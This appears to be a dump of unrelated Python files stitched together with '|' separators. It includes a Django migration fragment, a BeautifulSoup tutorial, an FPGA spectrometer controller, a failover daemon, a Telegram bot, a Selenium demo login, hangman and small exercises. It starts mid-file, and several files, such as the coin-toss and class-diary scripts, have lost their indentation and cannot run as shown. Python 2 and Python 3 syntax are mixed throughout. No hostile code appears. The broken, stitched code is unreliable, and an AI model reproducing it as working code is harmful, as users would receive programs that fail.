        ('posts', '0005_auto_20190518_0511'),
    ]

    operations = [
        # help_text changes only affect admin/form rendering, not the schema
        migrations.AlterField(
            model_name='post',
            name='modification_date',
            field=models.DateTimeField(help_text='Date the post was modified from original version.'),
        ),
        migrations.AlterField(
            model_name='post',
            name='publication_date',
            field=models.DateTimeField(help_text='Original publication date.'),
        ),
    ]
|
from bs4 import BeautifulSoup
html_doc="""
<html><head><title>The Dormouse's story</title></head>
<body>
<p class="title"><b>The Dormouse's story</b></p>
<p class="story">Once upon a time there were three little sisters; and their names were
<a href="http://example.com/elsie" class="sister" id="link1">Elsie</a>,
<a href="http://example.com/lacie" class="sister" id="link2">Lacie</a> and
<a href="http://example.com/tillie" class="sister" id="link3">Tillie</a>;
and they lived at the bottom of a well.</p>
<string>hello world<b></string>
<p class="story">...</p>
"""
# soup=BeautifulSoup(open('index.html'),'html.parser')
soup=BeautifulSoup(html_doc,'html.parser')
# 格式化输出
# print (soup.prettify())
# print (soup.title)
#
# print (soup.title.name)
#
# print (soup.title.parent.name)
#
# print (soup.p)
#
# print (soup.p['class'])
#
# print (soup.a['class'])
#
# print (soup.find_all('a'))
# print (soup.a['class'][0])
#
# print (soup.find(id="link3"))
# for link in soup.find_all('a'):
# print (link['href'])
# print (link.get('href'))
# print (soup.p.attrs)
# print (soup.p.string) 一个子节点的情况下
# print (soup.p.get_text())
# soup.p.string.replace_with("No longer old")
# print (soup.p)
# 直接子节点
# print (soup.head.contents)
# print (soup.head.contents[0])
# for child in soup.head.children:
# print(child)
# 子孙节点
# for child in soup.head.descendants:
# print(child)
# for string in soup.strings:
# print(repr(string))
# .stripped_strings 去除多余空白内容
# for string in soup.stripped_strings:
# print(repr(string))
# 递归得到元素的所有父辈节点 .parents
# for a in soup.a.parents:
# if a is None:
# print (None)
# else:
# print (a.name)
# 兄弟节点
# next_sibling
# next_siblings 迭代输出
# previous_sibling
# previous_siblings
# for sibling in soup.a.next_siblings:
# if sibling.name=='a':
# print (repr(sibling))
# 正则表达式
# import re
# for tag in soup.find_all(re.compile("^b")):
# print (tag.name)
# 返回所有的tag
# for tag in soup.find_all(True):
# print (tag.name)
# 方法
# def has_class_but_no_id(tag):
# return tag.has_attr('class') and not tag.has_attr('id')
# for tag in soup.find_all(has_class_but_no_id):
# print (tag.name)
# from bs4 import NavigableString
# def surrounded_by_strings(tag):
# return (isinstance(tag.next_sibling,NavigableString) and
# isinstance(tag.previous_sibling,NavigableString))
# for tag in soup.find_all(surrounded_by_strings):
# print (tag.name)
# import re
# soup.find_all(text="Rocky")
# soup.find_all(text=["Fork","Rocky"])
# soup.find_all(text=re.compile("fork"))
# soup.find_all(class_="rocky")
# 限制返回数量
# soup.find_all("a",limit=2)
# 默认是所有的子孙节点 直接子节点recursive=False
# soup.html.find_all("title",recursive=False)
# soup.find('title') <=> soup.find_all('title',limit=1)
# CSS 选择器
# print (soup.select("title"))
# for a in soup.find_all('a'):
# print (a.get('href'))
# for a in soup.select('a'):
# print (a['href'])
# 增
# from bs4 import Comment
# soup=BeautifulSoup("<a>Foo</a>",'html.parser')
# soup.a.append("Bar")
# new_string=soup.new_string(" there")
# soup.a.append(new_string)
# 在内容上添加注释
# new_string=soup.new_string(" Comment",Comment)
# soup.a.append(new_string)
# 添加Tag
# new_tag=soup.new_tag("a",href="http://www.baidu.com")
# soup.a.append(new_tag)
# 删
# 清空内容
# soup.a.clear()
# 移除文档树 并作为方法结果返回
# soup.a.extract()
# 移除文档树 并完全销毁
# soup.a.decompose()
# 改
# soup.a.replace_with(new_tag)
from bs4 import UnicodeDammit
dammit=UnicodeDammit("Sacr\xe9 bleu",["latin-1","iso-8859-1"])
print (dammit.unicode_markup)
|
from flask import Flask
from flask_restful import Resource, Api

from resource.hotel import Hoteis, Hotel

# Tip: `pip freeze` lists the packages installed in this environment.

app = Flask(__name__)
api = Api(app)

# REST endpoints: the hotel collection and a single hotel by id.
for resource_class, route in (
    (Hoteis, "/hoteis"),
    (Hotel, "/hoteis/<int:hotel_id>"),
):
    api.add_resource(resource_class, route)

if __name__ == '__main__':
    app.run(debug=True)
|
def coin_tosses(nums):
print "Starting the program..."
head_count=0
tail_count=0
import random
for i in range(0,nums+1):
print "Attempt #"+str(i)+": Throwing a coin...",
if round(random.random())==1:
print "It's a head! ...",
head_count+=1
else:
print "It's a tail! ...",
tail_count+=1
print "Got " +str(head_count)+" heads(s) so far and "+str(tail_count)+" tails(s) so far"
return
coin_tosses(5000)
|
#!/usr/bin/env python
__author__ = 'Ronie Martinez'
class DidYouMeanError(AttributeError):
    """AttributeError enriched with 'did you mean' suggestions.

    Bug fix: the composed message is now passed to the base class, so
    str(exc) and tracebacks show it (previously str(exc) was empty).
    """

    def __init__(self, class_name, attribute_name, close_matches):
        # Multi-line message: the error itself, then one suggestion per line.
        self.message = "\n".join(["AttributeError: '%s' object has no attribute '%s'." % (class_name, attribute_name),
                                  "Did you mean one of these?"] +
                                 ["\t%s" % match for match in close_matches])
        self.close_matches = close_matches
        super(DidYouMeanError, self).__init__(self.message)
class TimeLimitExceededError(Exception):
    """Raised when an operation exceeds its allotted time budget."""
    # Class-level default message; raise sites can use it directly.
    message = "TimeLimitExceededError: Time limit exceeded!"
|
#
# Class diary
#
# Create program for handling lesson scores.
# Use python to handle student (highscool) class scores, and attendance.
# Make it possible to:
# - Get students total average score (average across classes)
# - get students average score in class
# - hold students name and surname
# - Count total attendance of student
# The default interface for interaction should be python interpreter.
# Please, use your imagination and create more functionalities.
# Your project should be able to handle entire school.
# If you have enough courage and time, try storing (reading/writing)
# data in text files (YAML, JSON).
# If you have even more courage, try implementing user interface.
import argparse
import json
from collections import defaultdict
parser = argparse.ArgumentParser(description='Menu')
class ClassDiary:
diary = defaultdict(list)
courses = ["English", "Maths", "Chemistry", "Physics"]
squad = [["English", [
{'name': 'Jan', 'surname': 'Kowalski', 'attendance': 3, "grades": [3, 4, 5, 3, 3]},
{'name': 'Joahim', 'surname': 'Schmidt', 'attendance': 4, "grades": [5, 5, 5, 5, 5]},
{'name': 'Pedro', 'surname': 'Suarez', 'attendance': 3, "grades": [4, 3, 3, 3, 2]},
{'name': 'John', 'surname': 'Smith', 'attendance': 4, "grades": [3, 4, 4, 2, 2]}]],
["Maths", [
{'name': 'Jan', 'surname': 'Kowalski', 'attendance': 1, "grades": [3, 4, 4, 3, 3]},
{'name': 'Joahim', 'surname': 'Schmidt', 'attendance': 1, "grades": [3, 4, 4, 3, 3]},
{'name': 'Pedro', 'surname': 'Suarez', 'attendance': 3, "grades": [3, 4, 4, 3, 3]},
{'name': 'John', 'surname': 'Smith', 'attendance': 3, "grades": [3, 4, 4, 3, 3]}]]
]
def creatediary(self):
for course, student in self.squad:
self.diary[course].append(student)
def gettotalaverageofstudent(self, name, surname):
total_average = []
for subject, students in self.diary.iteritems():
for student in students:
for person in student:
if person.get('name') == name and person.get('surname') == surname:
grades = person.get('grades')
# print grades
# print sum(grades)/float(len(grades))
total_average.append(sum(grades) / float(len(grades)))
print sum(total_average) / float(len(total_average))
return sum(total_average) / float(len(total_average))
def gettotalaverageofall(self):
total_all_average = []
for subject, students in self.diary.iteritems():
for student in students:
for person in student:
total_all_average.append(self.gettotalaverageofstudent(person.get('name'), person.get('surname')))
print sum(total_all_average) / float(len(total_all_average))
return sum(total_all_average) / float(len(total_all_average))
def getcourseaverageofstudent(self, name, surname, course):
for subject, students in self.diary.iteritems():
if subject == course:
for student in students:
for person in student:
if person.get('name') == name and person.get('surname') == surname:
grades = person.get('grades')
print sum(grades) / float(len(grades))
return sum(grades) / float(len(grades))
def getcourseaverageofall(self, course):
average_of_course = []
for subject, students in self.diary.iteritems():
if subject == course:
for student in students:
for person in student:
average_of_course.append(
self.getcourseaverageofstudent(person.get('name'), person.get('surname'), course))
print sum(average_of_course) / float(len(average_of_course))
def getattendance(self, name, surname):
attendance = []
for subject, students in self.diary.iteritems():
for student in students:
for person in student:
if person.get('name') == name and person.get('surname') == surname:
attendance.append({str(subject): person.get('attendance')})
print attendance
def dumptojson(self):
print json.dumps(classDiary.diary, ensure_ascii=False, sort_keys=True, indent=4)
# Demo driver: build one diary instance and load the sample data.
classDiary = ClassDiary()
classDiary.creatediary()
# classDiary.gettotalaverageofstudent("Jan", "Kowalski")
# classDiary.getcourseaverageofstudent("Jan", "Kowalski", "English")
# classDiary.getcourseaverageofall("English")
# classDiary.getattendance("Jan", "Kowalski")
# TODO: total attendance, user interface, json
|
# For each candidate leader position i, everyone facing the wrong way must
# turn: the 'W's standing before i plus the 'E's standing after i.
# Print the minimum number of turns over all positions.
n = int(input())
s = input()

total_east = s.count('E')
seen_east = 0   # 'E' count up to and including the current position
seen_west = 0   # 'W' count strictly before the current position
best = None
for person in s:
    if person == 'E':
        seen_east += 1
    # 'W' before this spot turn east; 'E' after it turn west.
    cost = seen_west + (total_east - seen_east)
    if best is None or cost < best:
        best = cost
    if person == 'W':
        seen_west += 1
print(best)
|
from .models import ExtraInfo
from django.forms import ModelForm
class ExtraInfoForm(ModelForm):
    """
    The fields on this form are derived from the ExtraInfo model in models.py.
    """

    # One message per field, reused for both the "required" and
    # "invalid" validation errors.
    _ERROR_MESSAGES = {
        'your_age': u"Please tell us your age group.",
        'your_gender': u"Please tell us your gender.",
        'your_employment': u"Please tell us your employment sector.",
        'your_tenure': u"Please tell us your job tenure.",
    }

    def __init__(self, *args, **kwargs):
        super(ExtraInfoForm, self).__init__(*args, **kwargs)
        for field_name, msg in self._ERROR_MESSAGES.items():
            self.fields[field_name].error_messages = {
                "required": msg,
                "invalid": msg,
            }

    class Meta(object):
        model = ExtraInfo
        fields = ('your_age', 'your_gender', 'your_employment', 'your_tenure')
|
#!/usr/bin/env python
import time, struct, sys, logging, socket
import katcp_wrapper, log_handlers
import argparse
import pyqtgraph as pg
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
#bitstream = 'sb1k_2016_Oct_21_1640.bof.gz'
#bitstream = 'sb2k_2017_Jan_21_1219.bof.gz'
bitstream = 'sb4k_2017_Jan_21_1934.bof.gz'  # active FPGA bitstream; commented lines are alternatives
#bitstream = 'sb8k_2016_Oct_29_1539.bof.gz'
roach = 'r1511'  # ROACH board hostname
katcp_port = 7147  # KATCP control port
mac_base = (2<<40) + (2<<32) # 0x020200000000 -- base MAC; the board IP is added to it
class attrdict(dict):
    """A dict whose entries are also readable and writable as attributes."""

    def __init__(self, **kwargs):
        super(attrdict, self).__init__(**kwargs)
        # Aliasing __dict__ to the mapping itself makes d.key == d['key'].
        self.__dict__ = self
# Spectrometer configuration written to FPGA registers at startup.
opts = attrdict(
    nbins = 4 * 2**10,  # spectral channels (4k, matching the sb4k bitstream)
    fftshift = 2**32-1,  # shift at every FFT stage (all bits set)
    gain = 0x0100<<16 | 0x0100,  # written to 'gain'; 16_8-16_8 fixed point (per comment below)
    acclen = 100,  # accumulation length
    bitsel = 1<<6 | 2<<4 | 2<<2 | 2,  # output bit selection -- exact field layout: see gateware
)
def init_10gbe(dev, ip, port, dest_ip, dest_port):
    """Bring up one 10GbE core and point it at a fixed destination.

    dev is the Simulink block name (e.g. 'xgbe0'); the tap device is
    dev + '_core'.  Uses the module-level `fpga` client and `mac_base`.
    The MAC address is derived from the IP so each core is unique.
    (Python-2 style: trailing commas after print() suppress the newline.)
    """
    ip_addr, = struct.unpack('!L',socket.inet_aton(ip))
    mac_addr = mac_base + ip_addr
    devname = dev + '_core'
    print('Initializing %s fabric mac: %s, ip: %s, port: %i ...' %
        (dev, ':'.join(("%012X" % mac_addr)[i:i+2] for i in range(0, 12, 2)), ip, port)),
    fpga.tap_start(dev, devname, mac_addr, ip_addr, port)
    print('done')
    dest_ip_addr, = struct.unpack('!L',socket.inet_aton(dest_ip))
    print('Configuring %s destination IP and port %s:%i ... ' %
        (dev, socket.inet_ntoa(struct.pack('!L', dest_ip_addr)), dest_port)),
    fpga.write_int(dev + '_dest_ip', dest_ip_addr)
    fpga.write_int(dev + '_dest_port', dest_port)
    print('done')
    # Workaround for tgtap:
    # write destination ip address entry in arp table to all 0 mac address
    # instead of broadcast address filled by tgtap
    fpga.write(devname, '\0'*8, 0x3000 + 8 * (dest_ip_addr & 0xFF))
def exit_clean():
    """Stop the FPGA client (best effort) and terminate the process."""
    try:
        fpga.stop()
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are not swallowed; stop() failures remain deliberately ignored.
        pass
    exit()
def exit_fail(e=None):
    """Report a fatal error, dump buffered log messages, then exit.

    Bug fix: `e` now defaults to None because one call site (the failed
    connection path in main) invokes exit_fail() with no argument, which
    previously raised TypeError instead of reporting the failure.
    """
    print('FAILURE DETECTED.')
    if e is not None:
        print('Exception:')
        print(e)
    print('Log entries:')
    lh.printMessages()
    exit_clean()
def split_snapshot(snap):
    """Split an interleaved ADC snapshot into its two polarisations.

    The capture alternates 8 samples of pol0 with 8 samples of pol1.
    ``snap`` is a dict with 'length' (byte count) and 'data' (packed
    signed 8-bit samples).  Returns (pol0, pol1) as lists of ints.

    Fixes: no longer shadows the builtins ``len`` and ``all``, and uses
    floor division so the code also runs under Python 3.
    """
    nbytes = snap['length']
    samples = struct.unpack('%db' % nbytes, snap['data'])
    p0 = []
    p1 = []
    for i in range(nbytes // 16):
        p0 += list(samples[i*16 : i*16+8])
        p1 += list(samples[i*16+8 : (i+1)*16])
    return p0, p1
def plot_anim():
    """Refresh all plots from live FPGA snapshots (called by a QTimer).

    Updates, in order: ADC histograms (lines 0-1), raw ADC traces
    (lines 2-3), and the four spectrometer scopes A-D (lines 4-7).
    Relies on module-level `fpga`, `plts` and `lines` set up in main.
    (Python-2 style: the trailing commas after print() suppress newlines
    so the A/B/C/D summaries land on one status line.)
    """
    global fpga, plts, lines
    # ADC histogram
    snap = fpga.snapshot_get('zdok0_scope', man_trig=True, man_valid=True)
    pol0, pol1 = split_snapshot(snap)
    y, x = np.histogram(pol0, 100)
    lines[0].setData(x, y)
    y, x = np.histogram(pol1, 100)
    lines[1].setData(x, y)
    # ADC curve
    # lines[2].setData(pol0[0:1024])
    lines[2].setData(pol0)
    lines[3].setData(pol1[0:1024])
    # Spectrometer scope
    # Scopes A/B are unpacked unsigned ('I'), C/D signed ('i') -- the log
    # plot uses fabs() for the signed streams.
    snap = fpga.snapshot_get('x8_vacc_scope_A')
    speclin = np.array(struct.unpack('>%dI' % (snap['length']/4), snap['data']))
    speclog = np.log2(speclin+1)
    lines[4].setData(speclog)
    idx = np.argmax(speclog)
    print('A:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
    snap = fpga.snapshot_get('x8_vacc_scope_B')
    speclin = np.array(struct.unpack('>%dI' % (snap['length']/4), snap['data']))
    speclog = np.log2(speclin+1)
    lines[5].setData(speclog)
    idx = np.argmax(speclog)
    print('B:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
    snap = fpga.snapshot_get('x8_vacc_scope_C')
    speclin = np.array(struct.unpack('>%di' % (snap['length']/4), snap['data']))
    speclog = np.log2(np.fabs(speclin)+1)
    lines[6].setData(speclog)
    idx = np.argmax(speclog)
    print('C:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
    snap = fpga.snapshot_get('x8_vacc_scope_D')
    speclin = np.array(struct.unpack('>%di' % (snap['length']/4), snap['data']))
    speclog = np.log2(np.fabs(speclin)+1)
    lines[7].setData(speclog)
    idx = np.argmax(speclog)
    print('D:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
    print(bin(fpga.read_uint('status')))
#START OF MAIN:
# Connect to the ROACH, optionally program it, write the spectrometer
# configuration, bring up the 10GbE cores, then run a pyqtgraph window
# that refreshes once a second via plot_anim().
if __name__ == '__main__':
    try:
        lh = log_handlers.DebugLogHandler()
        logger = logging.getLogger(roach)
        logger.addHandler(lh)
        logger.setLevel(10)  # 10 == logging.DEBUG
        parser = argparse.ArgumentParser()
        parser.add_argument('-s', '--skip', action='store_true', default=False, help='Skip programming FPGA')
        parser.add_argument('-v', '--view', action='store_true', default=False, help='View only')
        args = parser.parse_args()

        print('Connecting to server %s on port %i... ' % (roach, katcp_port)),
        fpga = katcp_wrapper.FpgaClient(roach, katcp_port, timeout=10, logger=logger)
        time.sleep(0.1)

        if fpga.is_connected():
            print('ok')
        else:
            print('ERROR connecting to server %s on port %i.\n' % (roach,katcp_port))
            # NOTE(review): exit_fail is defined to take an argument; this
            # no-arg call would raise TypeError unless a default is added.
            exit_fail()

        print('-' * 20)

        # --view implies --skip: neither reprogram nor reconfigure.
        if not args.skip and not args.view:
            print('Programming FPGA with %s ... ' % bitstream),
            fpga.progdev(bitstream)
            print('done')

        if not args.view:
            print('Configuring spectrometer fft_shift, fft_shift=0x%X ... ' % opts.fftshift),
            fpga.write_int('fft_shift', int(opts.fftshift))
            print('done')

            print('Configuring spectrometer scale coefficients, gain=0x%X ... ' % opts.gain),
            fpga.write_int('gain', opts.gain) # in 16_8-16_8 format
            print('done')

            print('Configuring spectrometer bit selection, bit_select=0x%X ... ' % opts.bitsel),
            fpga.write_int('bit_select', opts.bitsel)
            print('done')

            print('Configuring spectrometer accumulation length, acc_len=%d ... ' % opts.acclen),
            fpga.write_int('acc_len',opts.acclen)
            print('done')

            # One 10GbE core per output stream; all aim at host .127.
            init_10gbe('xgbe0', '192.168.11.227', 33333, '192.168.11.127', 12345)
            init_10gbe('xgbe1', '192.168.12.227', 33333, '192.168.11.127', 12345)
            init_10gbe('xgbe4', '192.168.15.227', 33333, '192.168.15.127', 12345)
            init_10gbe('xgbe5', '192.168.16.227', 33333, '192.168.16.127', 12345)
            init_10gbe('xgbe6', '192.168.17.227', 33333, '192.168.17.127', 12345)
            init_10gbe('xgbe7', '192.168.18.227', 33333, '192.168.18.127', 12345)

            fpga.write_int('use_tvg', 0)  # disable the test-vector generator

            # Pulse the reset register to restart the pipeline.
            print('Issue reset signal...'),
            fpga.write_int('reset', 0)
            fpga.write_int('reset', 1)
            print('done')

        # set up the figure with a subplot to be plotted
        win = pg.GraphicsWindow(title='Single Beam')
        win.resize(1000, 800)
        plts = []
        lines = []
        # Row 1: two ADC histograms.
        for i in range(0, 2):
            scopenum = i
            plt = win.addPlot(title='ADC Hist %d' % scopenum)
            plts.append(plt)
            lines.append(plt.plot(stepMode=True, fillLevel=0, brush=(0,255,0,150)))
        win.nextRow()
        # Row 2: two raw ADC traces.
        for i in range(2, 4):
            scopenum = i - 2
            plt = win.addPlot(title='ADC Curve %d' % scopenum)
            plts.append(plt)
            lines.append(plt.plot())
        win.nextRow()
        # Rows 3-4: four spectrometer scopes, two per row, log2 y-axis.
        for i in range(4, 8):
            scopenum = i - 4
            plt = win.addPlot(title='SPEC Scope %d' % scopenum)
            plts.append(plt)
            plt.showGrid(y=True)
            plt.setYRange(0, 32)
            plt.getAxis('left').setTicks([[(0, '0'), (8, '2^8'), (16, '2^16'), (24, '2^24'), (32, '2^32')]])
            lines.append(plt.plot())
            if i%2 == 1:
                win.nextRow()
        print('Plot started.')
        plot_anim()

        # start the process: repaint every second until the window closes.
        timer = QtCore.QTimer()
        timer.timeout.connect(plot_anim)
        timer.start(1000)
        QtGui.QApplication.instance().exec_()

    except KeyboardInterrupt:
        exit_clean()
    except Exception as e:
        exit_fail(e)
    finally:
        exit_clean()
|
from selenium import webdriver
import time

# Demo: log into the OrangeHRM sample site with the public credentials,
# then close the browser.
CHROMEDRIVER_PATH = "C:\\Users\\ABHAY\\Selenium\\chromedriver.exe"

driver = webdriver.Chrome(executable_path=CHROMEDRIVER_PATH)
driver.implicitly_wait(30)
driver.maximize_window()
driver.get("https://opensource-demo.orangehrmlive.com/index.php/auth/login")
#time.sleep(3)

# Fill in username then password, pausing briefly after each field.
for field_xpath, value in (
    ("//input[@id='txtUsername']", "Admin"),
    ("//input[@id='txtPassword']", "admin123"),
):
    driver.find_element_by_xpath(field_xpath).send_keys(value)
    time.sleep(2)

driver.find_element_by_xpath("//input[@id='btnLogin']").click()
time.sleep(2)
driver.quit()
|
from threading import Thread
import socket
import SocketServer
import argparse
import signal
import logging
import subprocess
import sys
import time
# Node roles for the active/backup failover pair.
ACTIVE = 'ACTIVE'
BACKUP = 'BACKUP'
state = BACKUP  # current role; every node starts as backup
params = {}  # shared settings read by the handler: 'key' and 'prio'
class requestHandler(SocketServer.BaseRequestHandler):
    """Answers each peer probe with 'HA:<state>:<key>:<prio>:'."""
    def handle(self):
        global state
        # Wire format: fixed 'HA' marker, current role, shared secret, priority.
        self.request.send("HA:%s:%s:%s:"%(state, params['key'], params['prio']))
        return
def check_peer(addr):
    """Probe the peer at `addr` and return its advertised priority.

    Returns 0 when the peer is unreachable, replies with a malformed or
    empty message, or presents the wrong shared key.

    Fixes over the original: the socket is always closed (it used to
    leak on an empty reply), an empty reply no longer falls through to
    an IndexError on the empty `responses` tuple, and the unreachable
    trailing `return 0` after the final return has been removed.
    """
    global state
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(addr)
        try:
            response = s.recv(100)
        finally:
            s.close()
    except Exception as e:
        log.debug("[%s]: cannot connect to peer, %s" % (state, e))
        return 0
    if not response:
        log.debug("[%s]: empty response from peer" % state)
        return 0
    log.debug('[%s]: received from peer "%s"' % (state, response))
    try:
        responses = response.split(':')
    except Exception:
        log.debug("[%s]: malformed response from peer" % state)
        return 0
    # Expected layout: HA:<state>:<key>:<prio>:
    if responses[0] != 'HA':
        log.debug("[%s]: malformed response from peer, not found HA" % state)
        return 0
    if len(responses) < 4:
        log.debug("[%s]: malformed response from peer" % state)
        return 0
    if responses[3].isdigit() != True:
        log.debug("[%s]: malformed response from peer, priority not numeric %s" % (state, responses[3]))
        return 0
    if responses[2] != params['key']:
        log.debug("[%s]: received invalid key from peer" % state)
        return 0
    return int(responses[3])
def signal_handler(signal, frame):
    # SIGINT handler: exit cleanly on Ctrl-C.
    # NOTE(review): the `signal` parameter shadows the imported module.
    print "exiting..."
    sys.exit(0)
if __name__ == '__main__':
    # Active/backup failover daemon: serve our own state over TCP, poll the
    # peer's state, and switch roles based on reachability and priority.
    signal.signal(signal.SIGINT, signal_handler)
    parser = argparse.ArgumentParser()
    parser.add_argument("listen_ip", help="the local ip to bind to")
    parser.add_argument("listen_port", type=int, help="the local port to bind to")
    parser.add_argument("priority", type=int, help="the local priority")
    parser.add_argument("peer_ip", help="the ip to connect to the peer")
    parser.add_argument("peer_port", type=int, help="the port to connect to the peer")
    parser.add_argument("active_script", help="the script to launch when switching from backup state to active state")
    parser.add_argument("backup_script", help="the script to launch when switching from active state to backup state")
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="be more verbose")
    parser.add_argument("-k", "--key", default='OdcejToQuor4', help="the shared key between peers")
    parser.add_argument("-r", "--retry", type=int, default=3, help="the number of time retrying connecting to the peer when is dead")
    parser.add_argument("-i", "--interval", type=int, default=2, help="the interval in second between check to the peer")
    args = parser.parse_args()
    # Published to the peer by requestHandler.
    params['prio'] = args.priority
    params['key'] = args.key
    if args.verbose:
        logging.basicConfig(level=logging.DEBUG, format='%(levelname)s %(message)s')
    else:
        logging.basicConfig(level=logging.INFO, format='%(levelname)s %(message)s')
    log = logging.getLogger(__file__)
    srv_addr = (args.listen_ip, args.listen_port)
    peer_addr = (args.peer_ip, args.peer_port)
    # Start the state server in a daemon thread; retry the bind up to 9
    # times (e.g. while a previous instance's socket is in TIME_WAIT).
    for retry in range(1, 10):
        try:
            server = SocketServer.TCPServer(srv_addr, requestHandler)
            t = Thread(target=server.serve_forever)
            t.setDaemon(True)
            t.start()
            log.info("listen on %s:%s, ready" % (args.listen_ip, args.listen_port))
            break
        except Exception as e:
            log.warning("cannot bind on %s:%s, %s, retrying" % (args.listen_ip, args.listen_port,e))
            time.sleep(10)
    checked = 0  # consecutive failed probes while in BACKUP
    # Main poll loop: peer priority 0 means dead/invalid (see check_peer).
    while True:
        peer = check_peer(peer_addr)
        if state == BACKUP:
            if peer == 0:
                # Only promote after args.retry consecutive failures.
                if checked >= args.retry:
                    log.info("[%s]: peer is definitively dead, now becoming ACTIVE" % state)
                    checked = 0
                    state = ACTIVE
                    return_code = subprocess.call(args.active_script, shell=True)
                    log.info("[%s]: active_script %s return %d" % (state, args.active_script, return_code))
                else:
                    checked += 1
                    log.info("[%s]: peer is dead %s time, retrying" % (state, checked))
            elif peer < params['prio']:
                log.info("[%s]: peer is alive but with a lower prio, now becoming ACTIVE" % state)
                checked = 0
                state = ACTIVE
                return_code = subprocess.call(args.active_script, shell=True)
                log.info("[%s]: active_script %s return %d" % (state, args.active_script, return_code))
            else:
                log.info("[%s]: peer is alive with a higher prio, doing nothing" % state)
                checked = 0
        elif state == ACTIVE:
            if peer == 0:
                log.info("[%s]: peer is dead but we are active, doing nothing" % state)
            elif peer > params['prio']:
                # Demote only to a strictly higher-priority peer.
                log.info("[%s]: peer is alive with a higher prio, becoming BACKUP" % state)
                checked = 0
                state = BACKUP
                return_code = subprocess.call(args.backup_script, shell=True)
                log.info("[%s]: backup_script %s return %d" % (state, args.backup_script, return_code))
            else:
                log.info("[%s]: peer is alive with a lower prio, doing nothing" % state)
                checked = 0
        time.sleep(args.interval)
|
import asyncio
import logging
import os
from aiogram import Bot, Dispatcher, executor, types
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters import Text
from aiogram.dispatcher.filters.state import State, StatesGroup
from graph_utils import Last_Month
# Configure logging
logging.basicConfig(
    filename='bot.log',
    level=logging.DEBUG,
    format='%(asctime)s - %(name)s - %(message)s',
    datefmt='%d-%b-%y %H:%M:%S')

# Telegram token from Bot Father
TG_TOKEN = os.environ.get('TG_TOKEN')

# Initialize bot and dispatcher; MemoryStorage keeps FSM state in RAM
# (state is lost on restart).
bot = Bot(token=TG_TOKEN)
dp = Dispatcher(bot, storage=MemoryStorage())
class Form(StatesGroup):
    """ Fields for tasks """
    # FSM steps of the /get_graph_last_month conversation.
    stock = State()
    country = State()
    period = State()  # NOTE(review): declared but never entered by any visible handler
# Start with hello message
@dp.message_handler(commands=['start'])
async def send_welcome(message: types.Message):
    """Reply to /start with a short greeting (in Russian)."""
    reply = """
    Привет!
    Бот для помощи в Инвестициях и Трейдинге
    """
    await message.reply(reply)
@dp.message_handler(commands=['get_graph_last_month'])
async def get_graph_last_month(message: types.Message):
    """Start the graph conversation: prompt for a ticker, enter Form.stock."""
    reply = """
    send me stock, for example of Apple:
    AAPL
    """
    await message.reply(reply)
    await Form.stock.set()
@dp.message_handler(state=Form.stock)
async def process_add_stock(message: types.Message, state: FSMContext):
    """
    Process for adding stock

    Stores the ticker in FSM storage, then asks for the company's
    country and advances to Form.country.
    """
    async with state.proxy() as state_data:
        state_data['stock'] = message.text
    await message.answer(
        'Пришлите страну компании')
    await Form.country.set()
@dp.message_handler(state=Form.country)
async def process_add_country(message: types.Message, state: FSMContext):
    """
    Process for adding country

    Final step: Last_Month() renders the chart to a file path, which is
    sent back as a photo; the FSM conversation is then finished.
    """
    async with state.proxy() as state_data:
        state_data['country'] = message.text
        path = Last_Month(state_data['stock'], state_data['country'])
        with open(path, 'rb') as photo:
            await bot.send_photo(
                chat_id=message.from_user.id,
                photo=photo,
                caption=f"{state_data['stock']}\n{state_data['country']}")
    await state.finish()
if __name__ == '__main__':
    # Long-polling entry point; skip_updates drops messages sent while offline.
    executor.start_polling(dp, skip_updates=True)
|
# Hangman:
# 1. Keep a list of candidate words
# 2. random -> pick the secret word
# 3. Show the word as '------'
# 4. Check each guess against list(word)
# 5. 'vodka' -> " _ _ _ _ _ a" via enumerate
# 6. Detect win / lose
#
# FIX: this file contained unresolved git merge-conflict markers
# (<<<<<<< HEAD / ======= / >>>>>>>), which made it unparseable.
# The conflicts are resolved here in favour of the remote branch's wording.

# Gallows drawings, one per wrong guess (5 wrong guesses = loss).
statues = [
    """
    |------
    | o
    | |
    |
    |
    """
    ,
    """
    |------
    | o
    | |-
    |
    |
    """
    ,
    """
    |------
    | o
    | -|-
    |
    |
    """
    ,
    """
    |------
    | o
    | -|-
    | \\
    |
    """
    ,
    """
    |------
    | o
    | -|-
    | / \\
    |
    """
    ,
]

import random

mylist = ['apple', 'banana', 'orange']
solution = random.choice(mylist)
list_solution = list(solution)
print("_ " * len(list_solution), sep=" ")

# Progress display: one '_' placeholder per letter of the solution.
mylist1 = ['_'] * len(list_solution)

count = 0    # wrong guesses so far
count1 = 0   # letters revealed so far
a = True
while a:
    your_guess = input("Your word? ").lower()
    if your_guess in list_solution:
        if your_guess in mylist1:
            # Letter already revealed; don't count it again.
            print("You Guessed")
            continue
        print("You Right!")
        # Reveal every occurrence of the guessed letter.
        for index, item in enumerate(list_solution):
            if list_solution[index] == your_guess:
                mylist1[index] = your_guess
                count1 += 1
        print(*mylist1, sep=" ")
        if count1 == len(list_solution):
            print("You are WINNER!")
            break
    else:
        print("You Were Wrong")
        count += 1
        if count == 1:
            print(statues[0])
        elif count == 2:
            print(statues[1])
        elif count == 3:
            print(statues[2])
        elif count == 4:
            print(statues[3])
        else:
            # Fifth wrong guess: full gallows, game over.
            print(statues[4])
            print("YOU ARE LOSER")
            a = False
|
class AddHeader:
    """mitmproxy addon that tags every HTTP response with a marker header."""
    def response(self, flow):
        # Called once per response flowing through the proxy.
        flow.response.headers["newheader"] = "foo"
def load(l):
    # NOTE(review): `l.boot_into(...)` is not part of the standard
    # mitmproxy addon-loader API (addons are normally exposed via an
    # `addons = [...]` list) — confirm against the target mitmproxy version.
    return l.boot_into(AddHeader())
|
# coding:utf8
from flask_wtf import FlaskForm
from wtforms import StringField, RadioField, SubmitField, PasswordField, FileField
from wtforms.validators import DataRequired, ValidationError
from wtforms import validators, widgets
